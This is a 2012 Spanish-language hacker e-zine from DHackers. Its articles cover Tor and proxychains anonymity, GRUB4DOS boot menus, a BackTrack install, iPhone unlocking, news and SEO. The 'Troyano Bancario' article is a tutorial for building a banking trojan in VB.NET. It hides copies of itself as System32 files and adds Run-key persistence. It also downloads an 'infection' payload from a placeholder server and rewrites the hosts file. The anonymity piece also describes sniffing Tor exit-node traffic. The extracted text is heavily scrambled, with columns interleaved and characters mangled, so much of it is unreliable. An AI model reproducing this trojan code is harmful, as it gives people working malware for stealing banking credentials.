DIRECTOR
http://dhackers.com
PRODUCCION
www.siegroup.net
PUBLICIDAD Y DIFUSION www.turundus.net
ARTE Y DISEÑO
Josue Juarez Quezada
COLABORADORES Noely noe_c20@hotmail.com
m3x1c0h4ck designbyjos@hotmail.com SeNeGe senege@gmail.com
arthusu arthusuarthusu@gmail.com
locutus |_ocutuslocutus@elhacker.org IPepe iipepe@gmail.com
nomo11 aldolopez_11@hotmail.com RandomSoft random.soft@hotmail.com eb4bgr
Angel cantu jauregui angel.cantu@siegroup.net
CONTENIDO
CONTRASEÑA P.38 OBTENER DE FACEBOOK P.14 P.42 P. 4 P.30 P.24 P.18 P.32 P.34 P.10 P.28 P. 8 P.20 P. 5 P.16 P.40
Noticias del Primer Semestre del 2012 Fotomontaje 10 Pautas de Seguridad Entrando a un equipo con Armitage Fail2Ban Instalando BackTrack 5 r2 Trucos Windows 7 Conociendo mi PC Liberar iPhone 3G/3GS sin WiFi Baseband 6:15 Procedimiento de Desbloqueo de Celulares. Troyano Bancario en Visual Studio .NET SEO Google Privacidad en Internet Proxy TOR Ejemplos de Inicio de Grub4dos Levantando el Hyper Linux Parte 1
LA MEJOR COMUNIDAD DE HACKERS EN LATINOAMERICA
http://foro.dhackers.com/
10 Pautas de Seguridad
D
aremos las recomendaciones mas fáciles e imprescindibles para tener una seguridad fiel y que nuestro OS no se convierta en una maquina llena de virus y moustros que terminen con el sistema.
1 Tener siempre instalada una suite de seguridad o programas que estén separados que incluyan antivirus, firewall y detención de malware y en el correo y siempre verificar que estén actualizados correctamente. 2 Nunca divulgar nuestra dirección de correo electrónico, si no son personas confiables, pasa en muchos casos que las personas se pasan mostrando y dando a conocer su dirección por internet y paginas de ocio a si como de redes sociales sin saber el peligro que esto causa, antes primero saber que que el sitio en común es seguro. También es importante tener muchas cuentas alternativas (con diferentes contraseñas) y a si no tener que mantener mucho spam en una sola cuenta y hacer un backup en cada cuenta por si a caso. 3 Nunca abrir un archivo adjunto sin antes pasarle el antivirus, unas de las recomendaciones que doy es que es importante si en el momento no tienes antivirus que no es recomendable, ver la extencion de la misma, recordemos que la mayoría de los virus tienen extencion “exe” pero pueden estar camuflados por otra extencion engañosa. 4 Siempre tener en cuenta a quien agregamos o aceptamos en nuestra cuenta de mail, ya que a veces son intrusos que quieren que revelemos nuestra identidad a si como privacidad, un ejemplo son personas que siempre estan permanentemente preguntando cosas en común y nunca dejan que vos pregunte de la misma a si como intentan hacer una confianza lo mas rápido posible y lo logran, (a eso se llama Ing Social). 5 Nunca seguir enlaces de correos electrónicos que vienen de un mail, preferible copiar la dirección y ponerla en el navegador a si podrás tener mas control de ella. 6 Siempre tener en cuenta y seguridad a donde vamos a enviar nuestras fotos o archivos por medio de seguridad ya que esos archivos pueden revelar nuestra identidad y privacidad de la misma. 7 Nunca reponder correo basura a si llamado spam. 8 Pasa usar un buen navegador pero tenemos muchas alternativas como Intenret explorer, Opera, Firefox, Chrome etc… (recomendado Opera) y siempre ver tener activado “No Script” Como lo tiene Firefox.
4
SeNeGe
Privacidad en Internet
s
i estas leyendo esto es por que
estas preocupado por cuidar tu
privacidad mientras navegas (o haces cosas q no deberias), en cualquiera de los casos es una sana
preocupacion ya q cada vez es mayor la cantidad de datos q
dejamos por ahi y las ganas de los gobiernos y grandes
encima para cruzarlos con los suyos propios con oscuros propositos...
en españa por ejemplo ya se aprobo
la ley SINDE, entre cuyas atribuciones esta la de cortar el acceso a internet a los users q violen derechos de autor. mas alla de la ridiculez de la medida contra el usuario final que baja un
mp3, tengan en cuenta que hay toda una organizacion que checkea logs, pide mas logs y va a buscar gente a la
casa para cortarle la conexion a internet. ellos saben todo lo
que estas haciendo te guste o no,
cuando piden esos
registros ahi no esta
solo el link del mp3 sino
completamente todo lo q navegaste o hiciste.
obviamente en todos lados se
guardan logs pero afortunadamente en la mayoria de los paises se
necesita de una orden judicial y una
buena razon para obtenerlos y cuando digo "buena razon" no me refiero a
alguien bajando musica o un capitulo de "walking dead".
pero dejemos de divagar y vamos al tema...
5
|_ocutus
en este caso no es "salir" a internet
sino usar el "puente" para esconder
servidores proxy
nuestra direccion IP original.
difundido y comun para ocultar nuestra direccion IP son los proxies. un proxy
un proxy es un servidor es un servidor que que cumple la funcion de cumple la funcion intermediario en una de intermediario en una conexion, conexion.
corporaciones de ponerles las manos
TOR
por ejemplo en
una empresa el proxy es la maquina
que da acceso a internet a las de la red interna. desde ahi podemos controlar
trafico, aplicar permisos a los clientes y
muchas otras cosas, pero lo importante para lo que estamos viendo es la
funcion de hacer de "puente" hacia afuera.
supongamos q queremos abrir
xxxx.com. la pc de la red interna hace la peticion al proxy y este a su vez la
hace a xxxx.com despues de analizarla y
checkear en sus
reglas si la procesa o no. "xxxx", como cualquier web
server, guarda logs de las IPs que lo visitan, en este
caso la IP que queda en el log es la del
proxy y no la de la maquina interna que ni siquiera posee conexion directa
hacia afuera. de esta forma cualquiera que sea la pc en la red interna que
haga una peticion a xxxx siempre va a quedar en sus logs la IP del proxy. solo tenemos que pasar esto a nivel de internet y vemos claramente lo q hace un
haciendo una rapida busqueda en
google pueden encontrarse muchas
listas de proxies. si bien en teoria todo funciona como explique antes, los
proxies tambien guardan logs y ante
una orden judicial la mayoria de estos los entregan a las autoridades
correspondientes. una solucion usada durante muchos años es "encadenar"
proxies, haciendo q la peticion pase x varios de ellos antes de llegar a
destino. esto no hace imposible seguir el rastro de los paquetes pero si lo
hace mas dificil al tener que conseguir y analizar logs de varios lugares,
dependiendo de leyes locales y otros factores en todo caso es la solucion de anonimato mas rapida ya que se puede configurar practicamente en cualquier navegador y sistema
(incluyendo moviles) rapidamente y sin tener q instalar absolutamente nada. solo una lista de proxies q funcionen...
TOR
TOR fue originalmente diseñado para encriptar comunicaciones
gubernamentales de la "us navy". es
una red formada x nodos a traves de
los cuales viaja nuestra informacion x
rutas aleatorias. esta ruta, ademas de la info q viaja a traves de ella, esta
encriptada y cada uno de los relays en
TOR fue originalmente diseñado para encriptar comunicaciones
proxy. la peticion sale de la
pc hacia nuestro ISP (Internet Service
Provider), va hacia el proxy y el la hace
devolviendonos el resultado. la finalidad
la red solo sabe de cual viene la info y a cual va, no conoce el
destino final ni el
origen. la idea es crear un ruteo complicado, cambiarlo cada 10 minutos y no mantener logs.
el sistema parece perfecto... y es bastante
interfaz web. tiene infinidad de
para el uso normal asi q ya esta
nuestra privacidad. los sitios web toman
pero con la configuracion casi x default
conexiones en el puerto 9050.
bueno, pero esta lejos de proteger 100%
bastante mas info como el tipo de browser,
sistema, resolucion de pantalla, referals, etc, etc, etc.
ademas de esto, x la estructura de la red tor
opciones... es cosa de darle un rato sale andando. al final instalamos y configuramos todo... ;)
proxychains
corriendo y escuchando
como prueba pueden agregar en el navegador los datos de proxy socks como localhost en ese puerto y ya deberia estar
funcionando. en firefox vamos a:
es posible sniffar datos en texto plano con
el problema viene muchas veces
detalle como xq se extiende mucho el tema
conexion de consola. en un browser es
en "connections" hacemos click
le puede poner proxy casi a todo,
campos:
bastante facilidad. no voy a explicar en
pero la vulnerabilidad se basa en el ultimo
tramo de la ruta, del ultimo nodo al server de destino, donde la informacion viaja sin
encriptacion alguna. solamente hay q setear tor como "exit node" para ser ese ultimo
eslabon y ponernos a sniffar todo el trafico q pasa x el...
PRIVOXY en la mayoria de los tutoriales de instalacion de TOR se incluye PRIVOXY. esto se debe
cuando queremos anonimizar una
facil de configurar y aunque en linux se siempre hay algo q falta o no es
edit > preferences > advanced > network
en "settings" y completamos los
comodo andar editando archivos de configuracion todo el tiempo para
usarlos solo un rato. con proxychains no solo podemos pasar cualquier cosa a traves de un proxy sino q
facilmente podemos crear cadenas
como las q hablabamos al principio o simplemente redirigirlo a tor.
a q con este ultimo podemos ocultar mucha
en caso de usar propios las listas
aplicaciones cuando se conectan a internet
distintos. aleatorio, orden exacto o
el siguiente paso es configurar
sacar de la cadena proxies muertos.
/etc/privoxy/ y editamos el
de la informacion que entregan nuestras
pero tambien a q en firefox hay un problema con el soporte para socks (q usa tor) q
genera timeouts, lo cual resulta en paginas
pueden encadenarse de 3 tipos
dinamico q es capaz de identificar y
privoxy. nos vamos a
archivo "config", al final
q no cargan aleatoriamente y ese tipo de
puede usarse practicamente con
espera q se complete el circuito en la red y...
ssh, wget... o lanzar aplicaciones
forwardsocks4a / localhost:9050 .
otro serio problema con tor son los "DNS
# proxychains ssh root@.....
con esto lo q hacemos es redirigir el
se hace una peticion normal a un server
# proxychains pidgin
corre en el puerto 8118, de manera q
problemas. simplemente firefox a veces no timeout!
leaks" o fugas dns. antes de enviar los datos DNS para resolver el nombre para recien
entonces encriptarlos y enviarlos. el trafico
sigue estando a salvo pero no la actividad q
cualquier aplicacion de consola, nmap, graficas, simplemente:
# proxychains nmap sT .....
Instalando y configurando todo
es facilmente rastreable. esto se soluciona
la explicacion va para debian y sus
leaks. la idea entonces es instalar privoxy, q
ubuntu q es lo q usa la mayoria (yo sigo
usando privoxy que justamente evita los dns este "limpie" todos estos datos segun el
nivel en q se lo pidamos y le pase la peticion a tor. este crea el circuito, la envia y
despues de atravesarlo llega a destino. la aplicacion se puede configurar con un
simple editor de texto o desde una intuitiva
6
derivados, obviamente sirve perfecto para
agregamos la linea:
(con el punto al final incluido)
trafico de privoxy a tor. privoxy
con esos datos configuramos ahora
el navegador pero en lugar de "socks host" usamos "http proxy" y
checkemos "use this proxy server for all protocols".
prefiriendo el original... je). empezamos x
para configuracion mas fina se
encuentran en los repositorios:
accede x medio de la url:
descargar e instalar las 3 aplicaciones q se # aptget install tor privoxy proxychains
puede usar la interfaz web a la q se
(con sudo en ubuntu)
http://config.privoxy.org/
Tor no necesita mayor configuracion
de ahi vamos a:
"View & change the current configuration" (http://config.privoxy.org/show足status) y
podemos modificar muchisimas opciones, desde cambiar el user足agent hasta sacar las animaciones a los GIFs.
otra opcion interesante es hacer q privoxy escuche conexiones de toda la lan,
pudiendo asi tener una sola maquina
corriendo tor y privoxy para usarla desde
cualquiera en la red. para eso agregamos al final la linea:
listen足address x.x.x.x:8118 donde x.x.x.x es la ip de la pc local q esta corriendo privoxy. despues de esto se
puede configurar como proxy en cualquier pc conectada a la lan.
finalmente nos queda proxychains para usar aplicaciones de consola. vamos a
/etc/ y editamos "proxychains.conf". al final agregamos (o descomentamos): socks4 127.0.0.1 9050 enviando el trafico a tor. por las dudas
asegurense de q strict_chain y proxy_dns esten descomentados. si quieren poner una lista de proxies este tambien es el lugar en el formato q esta arriba.
epilogo... todo esto sirve para tener un anonimato
aceptable pero tampoco significa q seamos "inrastreables" ni mucho menos ante una investigacion "seria". para ser
completamente anonimos en una accion puntual lo mejor es usar un sistema
operativo en un CD/DVD booteable y
conectarse a una red publica bien lejos de
cualquier lugar q pueda relacionarse con la persona q la realiza.
si vas a hacer algo en algun punto "ilegal",
no te sientas intocable x usar tor... si vas a hacer algo ilegal... mejor no lo hagas. 余)
7
Troyano Bancario
(Parte I)
S
aludos queridos amigos, en esta oportunidad
os enseñare a crear un pequeño troyano bancario, para eso tenemos que tener el programa: Visual
Studio .Net 2010 Professional (de preferencia). Bueno iré al grano, luego determinaremos las funciones que tendrá nuestro troyano. Funciones: 1. AUTOCOPIA Y OCULTACIÓN. 2. AUTOARRANQUE.
3. VERIFICACIÓN DE INTERNET.
En conclusión tendremos una condición como esta:
Public Sub AutoCopy() If
File.Exists(“C:\Windows\System32\winl
empiecen a crear sus FlujoGramas,
Pseudocódigos y todo ese rollo que uno tiene que
hacer al crear un Software, pero como no estamos para perder el tiempo, iremos directo al grano, claro que al hacer todo ese rollo nos facilitará
hacer la programación más completa y ordenada, pero al diablo con eso.
1. Autocopia y Ocultación: Para continuar con este procedimiento tenemos primero que verificar si el troyano se encuentra almacenada en la computadora, para eso utilizaremos el código:
File.Exists(“C:\directorio donde haremos que se almacene el troyano”)
Luego de eso podremos usar el código de copiar:
File.Copy(Application.ExecutablePath.ToStri ng, “C:\directorio donde haremos que se almacene el troyano”, True)
Y no os olvidáis del atributo de Ocultación, para eso utilizaremos este código:
File.SetAttributes(“C:\directorio donde
haremos que se almacene el troyano”, FileAttribute.Hidden)
8 RandomSoft
Return True
3. Verificación de Internet:
, True)
En esta función lo que haremos será
32\windrivers.exe”,
encuentra nuestro troyano dispone de
“C:\Windows\System32\windrivers.exe” File.SetAttributes(“C:\Windows\System FileAttribute.Hidden) Else
“C:\Windows\System32\winlogon.exe”,
bancario, si lo queréis hacer más formal, entonces
End Try
oString,
File.Copy(Application.ExecutablePath.T
6. REPETIR T.A.
podemos empezar a crear nuestro troyano
Catch ex As Exception
End Function
File.Copy(Application.ExecutablePath.T
Después de tener bien claras nuestras funciones,
haremos que se almacene el troyano”)
ogon.exe”) Then
4. DESCARGA DE ARCHIVO. 5. INFECCIÓN DEL HOSTS.
nuestro registro”, “C:\directorio donde
oString, True)
File.SetAttributes(“C:\Windows\System
32\winlogon.exe”, FileAttribute.Hidden) End If
End Sub
2. Autoarranque:
verificar si el ordenador donde se
internet y así de esa manera poder
habilitar algunas funciones y evitar que se ejecuten en vano en caso de no disponer con internet, para eso
utilizaremos esta sentencia de códigos: Public Function VerifyInternet() As Boolean
Try
If
My.Computer.Network.IsAvailable = True Then
Return True
Esto nos ayudará a ejecutar
Else
que inicie el sistema operativo, para eso
End If
automáticamente nuestro troyano cada vez tenemos que conocer el registro de Windows y crear un registro en el
directorio de arranque de la ubicación
Return False
Catch ex As Exception Return False
End Try
donde se encuentra almacenada nuestro
End Function
declaramos la variable:
4. Descarga de Archivo:
Dim Calculate As RegistryKey
Ahora procederemos a descargar nuestro archivo de infección para el hosts, utilizamos este pequeño código:
troyano y ponerle un nombre, ante todo
Private Function AutoArranque() As Boolean
ListRun =
"SOFTWARE\Microsoft\Windows\Current Version\Run"
Registry.CurrentUser.DeleteSubKeyTree(L istRun)
Try
Calculate =
Registry.CurrentUser.CreateSubKey(ListR un)
Calculate.SetValue(“Nombre de
My.Computer.Network.DownloadF ile(“URL de nuestro archivo de infección”, “C:\directorio donde se almacenará la descarga”) Pero antes de iniciar la descarga de nuestro archivo tenemos que verificar si la URL se encuentra
disponible, para eso tenemos que declarar las variables de esta forma: Dim PositionValue As WebRequest Dim ResponseHtml As HttpWebResponse Dim Declared As String Public Function Verify_URL(ByVal
URL_Only As String) As String Try PositionValue = WebRequest.Create(URL_Only) ResponseHtml = CType(PositionValue.GetResponse(), HttpWebResponse) Declared = ResponseHtml.StatusDescription() Catch ex As WebException End Try Return Declared End Function
String
El código que nos servirá para leer el contenido de nuestro archive es este: ColumnValue =
File.ReadAllText(“C:\directorio del archive a leer el contenido”)
Y el que nos permitirá reinscribir el
contenido de nuestro archivo es este otro: File.WriteAllText(“C:\directorio del contenido que escribiremos”)
Public Function Infecion() As String On Error Resume Next ColumnValue =
File.ReadAllText(“C:\cuentas.txt”) CountPerformance =
ColumnValue.ToString()
If CountPerformance <> "" Then
Public Sub CopyrightInf() If VerifyInternet() = True Then If Verify_URL(“http://www.miservidor.c om/infeccion.mp3”) = ConditionValue Then My.Computer.Network.DownloadFile( “http://www.miservidor.com/infeccion. mp3”,“C:\Windows\System32\wieurkd n.dll”) End If End If End Sub
End Function
contenido del archivo que descargamos y luego reinscribir el contenido de nuestro archivo hosts, para eso declaramos una
varible de tipo string el cual contendrá la información:
9
Para que un programa sea un troyano sólo tiene que acceder y controlar la máquina anfitriona sin ser advertido.
File.WriteAllText(“C:\directorio del
archive a reinscribir”, “Hola Mundo by
Aquí lo único que haremos será leer el
es para un fin educativo, el grupo DHackers y mi persona no nos hacemos responsables del mal uso de esta revista, para cualquier dudo o para mayor información no duden en contactarme.
Saludos de RandomSoft.
archive que reinscribiremos”, “Aquí el
Después haremos una condición para proceder con la descarga
5. Infección del Hosts:
Bueno amigos eso es todo por el momento, por motivos de seguridad no coloco el script completo o el resultado final, esta EZine DHackers
Dim ColumnValue, CountPerformance As
RandomSoft”) End If
6. Repetir T.A: En esta función necesitaremos de un Timer para repetir las demás funciones que anteriormente hicimos, ante todo declararemos las variables. Dim d As Integer Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick d=d+1 If (d = 500) Then Try AutoArranque() d=0 Catch ex As Exception End Try End If End Sub
Liberar iphone 3G/3GS sin wi-fi base band 6.15
E
sta vez les traigo un tutorial de como liberar nuestro iphone sin wifi Muchos sabrán que los iphone se liberan por el wifi... Esta vez utilicé un 3GS con la versión 5.0.1 que es la última versión (En algunos casos no se pudo liberar con dicha versión, a si que, si no
Ultrasn0w 1 .2:
Ifunbox:
http://www.mediafire.com/?plo7alk33tn2soc
http://dl.ifunbox.com/ifunbox_en.zip
les funciona tendrán que hacerle downgrade) Necesitamos los siguientes archivos a descargar.Tener nuestro iphone previamente hecho Jailbreak ya que los archivos se instalan en Cydia. Y por supuesto con base band 6.15
Abrimos el Ifunbox con nuestro iphone conectado. Casi no hay explicación ya que las imágenes hablan por sí solas…
10
nomo11
11
En la carpeta "AutoInstall" arrastramos los archivos que descargaron â&#x20AC;&#x153;Ultrasn0wâ&#x20AC;? son 2 archivos, los arrastramos a la carpeta.
12
Nota: Si alguna carpeta no aparece en su iphone, háganla ustedes mismo tal y cual como muestra las imágenes, con mayúsculas y minúsculas, ya que si no lo hacen a sí, no lo reconocerá su iphone.
13
Notic
Noticias
ENERO
Megaupload y megavideo dicen adiós, El FBI cierra el mayor sitio de intercambios El departamento de Estado de EE.UU. , el FB I y otras autoridades internacionales decidieron clausurar Megaupload y detener a sus responsables , acusados de conspiración para cometer un crimen organizado , lavado de dinero , infracciones de derechos de autor de forma masiva y violación de la propiedad intelectual , lo cuales podrían enfrentar una cadena de hasta 50 años de prisión. Esta operación fue dirigido en contra de Megaupload (por intercambio de archivos) y Megavideo (visualización de videos en internet) . Ambas son propietarias de la misma compañía. El departamento de Justicia acusa a sus responsables de la piratería masiva en todo el mundo de diferentes obras protegidas por derechos de propiedad intelectual
FEBRERO
MySpace volvió y ya tiene nuevos usuarios
El retorno de MySpace ( en el 2005 y 2008 había sido el sitio
más visitado) había perdido a sus usuarios debido al gran boom de Facebook y otras redes sociales .
En el 2012 luego de un cambio de dueños y
estrategias , gracias a la frase “si no puedes con tus
enemigos únete a ellos” , hizo que cada día se abran 40 mil nuevas cuentas . Aprovecharon las 42
millones de canciones de las que dispone la red social , la convirtieron en un nodo de música y entretenimiento para compartir en Facebook y Twitter.
Sony Ericsson ahora se llama Sony Mobile Communications
La compra de Sony había sido anunciada en
octubre del 2010 pero recién este año se hizo efectiva la compra.
http://www.infobae.com/adjuntos/jpg/2011/11/60 0x0_484482.jpg
Sony Mobile Communications integrará el
segmento de celulares como un elemento vital de su negocio de la electrónica.
MARZO El debut en España de la ley Sinde A partir de esta normativa se creó una comisión gubernamental que será el ente regulador encargado de evitar las descargas ilegales y además tienen autorización a cortar el acceso de la web a los usuarios que violen los derechos de propiedad intelectual. http://www.infobae.com/adjuntos/jpg/2011/01/600x0_336614.jpg Esta norma fue aprobada en el Congreso de España en el año 2011y conto con el apoyo de entidades de gestión de derechos de autor y la industria audiovisual. Paypal presentó un nuevo dispositivo de pagos vía celular Paypal presento un dispositivo que ayuda a las empresas a aceptar tarjetas de crédito y de débito. http://www.infobae.com/adjuntos/jpg/2012/03/600x0_520529.jpg Paypal Here es una aplicación móvil que se instala en celulares , por el momento solo funciona con el iPhone. Más adelante servirá a los equipos con Android de Google. Este sistema permite a los comercios a aceptar pagos mediante dispositivos portátiles.
14
Noely
cias Primer semestre del año
ABRIL
Firefox presento su nueva versión "Firefox 12" Mozilla presento su nueva versión para Windows , Mac y Linux.En él se destaca la actualización del navegador , que se hace de manera más rápida y sencilla y mejoras en las prestaciones para los desarrolladores (medios de control para la reproducción de videos HTML 5 y JavaScript). http://www.infobae.com/adjuntos/jpg/2012/ 04/600x0_532059.jpg Pinterest, la red social que consiguió el tercer puesto de popularidad en EE.UU. Esta red social que permite compartir y recomendar imágenes entre usuarios creando un portafolio temático , aumento en enero y febrero con un 50 % de visitas de EE.UU. , posicionándose en el tercer puesto de las más populares (Facebook en el primer puesto y segundo Twitter) .Este aumento de visitas fue gracias a una recomendación de la revista Time. http://www.infobae.com/adjuntos/gif/2012/ 02/600x0_511141.gif
MAYO
Celebración del día de Internet Las Naciones Unidas decidieron designar como el 17 de Mayo como el Día Mundial de las Telecomunicaciones y de la Sociedad de la Información. “Este día servirá para dar a conocer mejor la importancia que tiene este recurso mundial , surge de la sociedad , por la sociedad y para la sociedad “. http://www.youtube.com/watch?v=i4RE6dBAjH 4&feature=player_embedded
JUNIO Twitter presento su nuevo logo Ahora se la identificara solo con el pajarito azul , este logo surgió de un amor por la ornitología y el diseño simple y efectivo. http://www.infobae.com/adjuntos/jpg/2012/06/ 600x0_548255.jpg Este nuevo logo sugiere el buen momento que atraviesa Twitter y el exitoso futuro que le aguarda.
15
Ejemplos de inicio con
GRUB4DOS
Seguro que muchos de vosotros os
independientemente del que sea:
cómo iniciar varios Sistemas
title Boot from HardDrive\n
USB, o desde el propio CD/DVD. Hay
chainloader (hd0,0)+1
habréis preguntado más de una vez Operativos desde un mismo dispositivo varias herramientas que facilitan esta tarea, pero con un poco de tiempo
podréis conocer una de las mejores, GRUB4DOS.
En este artículo os quiero mostrar
varios ejemplos de lo que podéis hacer con este magnífico BootLoader. Todos los ejemplos son reales y funcionan con GRUB4DOS 0.45 editando el archivo menu.lst
Empezaremos con algo sencillo, cómo
cargar la imagen de un Floppy Disk de
inicio. Para hacer esto se soportan los formatos .Img y .Gz por lo que el archivo de la imagen de vuestro
disquette puede estar comprimido y ocupar menos espacio: title
Disk\n
Windows 98 Floppy
find setroot
/mypath/win98dos.gz
title
boot
find setroot ignore
Ahora vamos a indicarle que cargue en
la memoria R.A.M. la imagen .Iso de un Live‐CD y que la inicie. Esto es útil si no tenemos unidad de CD/DVD en
nuestro PC, pero tenemos que tener
memoria R.A.M. suficiente para cargar la imagen y para iniciar el Sistema Operativo que tenga el CD/DVD.
Únicamente hay un tipo de inicio que
GRUB4DOS no nos permite hacer, y es iniciar una imagen .Iso si el dispositivo de inicio es el propio CD/DVD. Para
poder usar este método, el archivo .Iso que contenga la imagen de nuestro
title
Windows 9x\n
floppies /mypath/ubuntu 12.04desktopi386.iso
map /mypath/ubuntu12.04 desktopi386.iso (0xff) map hook
root (0xff)
kernel /casper/vmlinuz
boot=casper BOOT=casper iso scan/filename=/mypath/ubuntu 12.04desktopi386.iso
persistent rw splash vga=791 max_loop=255
initrd /casper/initrd.lz boot
www.boot‐
usando el método más fácil.
desfragmentado. Más información en land.net/forums/index.php?showtopic= 8797 / www.boot‐
land.net/forums/index.php?showtopic= 5041&st=20
find setroot ignore
desde el HD:
LiveCD\n
Ahora vamos a iniciar un PC que
boot
para iniciar Windows 9x, esta vez
Ubuntu 12.04 Linux
CD/DVD tiene que estar
title My .Iso Image in
Ahora haremos una pequeña variante
Linux:
rootnoverify (hd0,0)
kernel /mypath/memdisk
initrd /mypath/win98dos.gz
ejemplo en concreto es para Ubuntu
R.A.M.\n floppies
/mypath/myisoimage.iso
map /mypath/myisoimage.iso (0xff) || map mem
/mypath/myisoimage.iso (0xff)
tenga instalado Windows Xp en el HD, GRUB4DOS soporta varios tipos del Sistema de Archivos, incluyendo
FAT32, NTFS y NTFS comprimido: title MicroSoft Windows Xp\n rootnoverify (hd0,1)
chainloader (hd0,1)+1
find setroot ignore
floppies ignorecd /NtLdr chainloader /NtLdr boot
Y el mismo inicio usando un método alternativo:
find setroot ignore
map hook
chainloader /Io.Sys
boot
title MicroSoft Windows Xp\n
Y aquí una pequeña variante si nuestro
floppies ignorecd /NtLdr
floppies /Io.Sys boot
También podemos indicarle que inicie
el PC desde el Sistema Operativo que haya en nuestro HD,
16
eb4bgr
chainloader (0xff)
PC no tiene suficiente memoria R.A.M.
y queremos iniciar la imagen .Iso desde el archivo que la contiene. Este
find setroot ignore map () (hd0) map (hd0) () map rehook
find setroot ignore
floppies ignorecd /NtLdr
Para instalar el cargador de
boot
utilizar las herramientas que vienen
chainloader /NtLdr
Vamos a usar el mismo método para iniciar Windows Vista/Seven:
GRUB4DOS en el sector MBR podéis con el programa. Lo más sencillo es
iniciar nuestro PC con la herramienta Hiren's Boot‐CD
(http://www.hirensbootcd.org/downlo
title MicroSoft Windows
ad), y desde el menú de herramientas
find setroot ignore
Grub4Dos Installer. Después de esto,
map () (hd0)
queréis poner el cargador de
map rehook
en el HD) y pulsais en el botón
floppies ignorecd /bootmgr
archivo GrLdr al directorio raíz de la
boot
sector MBR con el cargador de
Vista/Seven\n
de HBCD seleccionar el programa
floppies ignorecd /bootmgr
seleccionais la unidad USB en la que
map (hd0) ()
GRUB4DOS (también podeis hacerlo
find setroot ignore
"Install". Después hay que copiar el
chainloader /bootmgr
partición donde habeis modificado el
También podemos indicarle que inicie Ubuntu Linux en una partición de
nuestro HD. Antes de hacer esto hay
que entrar en la Línea de Comandos de
GRUB4DOS y ejecutar la orden "UUID", que es la que nos muestra los
identificadores de las particiones:
GRUB4DOS, y que esa partición esté marcada como activa para iniciarse.
AVISO IMPORTANTE: Si instalas
GRUB4DOS en la misma partición del HD donde tengas instalado Windows
Vista/Seven, te elimina la información de licencia de Windows y tu copia
aparecerá como no registrada. Este hecho no se produce si instalas
title Ubuntu 11.04 Linux\n
Ubuntu Linux en un PC con Windows
7117f617ac4a
GRUB, el proyecto original. Tened
root=UUID=071e0978fb774d32
Como habéis podido ver, este
vga=791 max_loop=255
hacer prácticamente todo lo que
boot
os haya resultado útil.
Para finalizar, os muestro unas pocas
Alejandro Padrino.
uuid 071e0978fb774d32934e
Vista/Seven. Ubuntu Linux utiliza
kernel /vmlinuz
cuidado.
934e7117f617ac4a ro splash
excelente BootLoader nos permite
initrd /initrd.img
deseamos. Espero que este artículo
cosas más que se pueden hacer con GRUB4DOS.
Línea de comandos de GRUB4DOS: title Grub4Dos CommandLine\n commandline
Reiniciar el PC:
title ReBoot Computer\n reboot
17
http://grub4dos.sourceforge.net
Instalando el sistema operativo backtrack 5 r2 Bienvenidos a la ezine dhackers… bueno en este articulo les enseñare a instalar este increíble sistema operativo llamado backtrack 5 r2 Ahí es la opción para iniciar podemos
iniciar de diferentes maneras backtrack nosotros usaremos la primera Defaul
aunque puedes usar sin red, sin driver y memoria de intercambio, modo seguro,
memstest(para comprobar tu memoria ram) y bootear desde el disco duro :P
Ahi es la opcion para iniciar
podemos iniciar de diferentes maneras backtrack nosotros
usaremos la primera Default
aunque
puedes usar sin red, sin driver y memoria de intercambio, modo
seguro, memstest(para comprobar tu memoria ram) y bootear desde el disco duro:
Nos saldrá la siguiente pantalla ahí le ponemos:
Startx
Para iniciar el modo grafico
18
arthusu
Configuracion del teclado
Otro paso muy importante es que podemos instalar backtrack como una partici贸n de disco duro y usar dos sistemas
operativos a la ves, pero para no enrollarnos lo instalamos en todo el disco duro y a probar.
Le damos Borrar y usar el disco entero y Adelante
Ya solo hay que esperar a que se llene al 100% la instalaci贸n
Por ultimo backtrack nos avienta un login, para ello los datos por defecto son: Bt login: root Password: toor Y listo solo inicias el modo grafico con Startx ahora si a probar backtrack
19
SEO
Hola bueno, antes de que empiecen a leer este "manual" quiero dar mi opinion de que lo que esta puesto aca no esta actualizado y eso quiere decir que google no siempre usa las mismas técnicas de
búsquedas y de mediciones para la info, también quiero decir que a pesar de hacer todo lo que dice eso no va a decir que vamos a estar primeros ya que es todo relativo, y la mejor forma de durar es con
google que localiza una pagina, se guarda la informaci?n sobre la
misma, la analiza, la pasa a un editor, y a esa pagina se le da una nota. Una nota entre el 1 y el 10. A esa nota se le conoce como PageRank.de 2/10
el tiempo, osea mientras mas
?Como puedes saber el PageRank de las p?ginas que visitas?
cuenta.
F?cil, con una herramienta, la Googlebar. Descargal? e instalal?:
Manual para mejorar tu
Aqui teneis el enlace ara los que usan Explorer y para los que usan un
(Rollo Barrio Sesamo),
saber cual es el page rank de una p?gina, si no que incluso podremos
tiempo en la red mas te tendran
posicionamiento en Google. Google es el "pupo buscador" por excelencia. De hecho hay
buscadores y luego hay Google, y punto.
Hacer que tu pagina aparezca en Google es m?s que sencillo, de
navegador de verdad, Modzilla. Con la googlebar, podremos no solo "VOTAR" a esa p?gina para que google tenga una referencia de
nuestros gustos. Adem?s incluye otras interesantes opciones que ya ir?is descubriendo.
?Me hablas un poco m?s del Page Rank?
hecho basta con que alguien que ya este indexado en su base de
Pues para que os hag?is una idea:
encontrar?. (Google siempre te encuentra por que google manda)
importante, ?sea, que cualquier palabra que se escriba en esa Web, es
datos, haga un link desde su pagina a la tuya, y Google te Tambien puedes sugerirle que lea tu pagina desde aqu?
Ahora, la gracia est? en estar bien posicionado, ?sea, aparecer en
Una pagina Web que tiene un page rank 5/10 o 6/10 es una p?gina
una palabra que aparecer? casi siempre, en los primeros resultados de google: Consecuencia> mogoll?n de visitas.
las primeras posiciones de b?squeda. Por que esta muy bien eso de
?Por qu? es interesante recibir visitas a tu p?gina desde google?
33.
En primer lugar por que mola :) . Y en segundo, por que eso quiere
decir: Eh, Eh, que aparezco en google. Cuando sales en la pagina
?Como funciona Google?, ?Que es el posicionamiento? Google usa un algorritmo (No, eso no se baila) de b?squeda
bastante complejo, pero muy efectivo. (Aunque ?ltimamente
comience a ir como un culo). Ese c?lculo de google se encarga, en
parte, de valorar la calidad o importancia de una pagina. Google de
decir que llegara gente que se interesa por lo que escribes.
Pues a ver. Si tienes un page rank 2/10 o 3/10... La verdad, es que de google te van a venir pocas cosas. Lo suyo es tener como m?nimo
4/10 o 5/10. Para lograr aumentar el page rank de tu p?gina, aqu? van algunos consejos imprescindibles:
hecho tiene mogoll?n de bots navegando por Internet
1 Tener el c?digo de tu pagina, limpio y ordenado,( A Google le
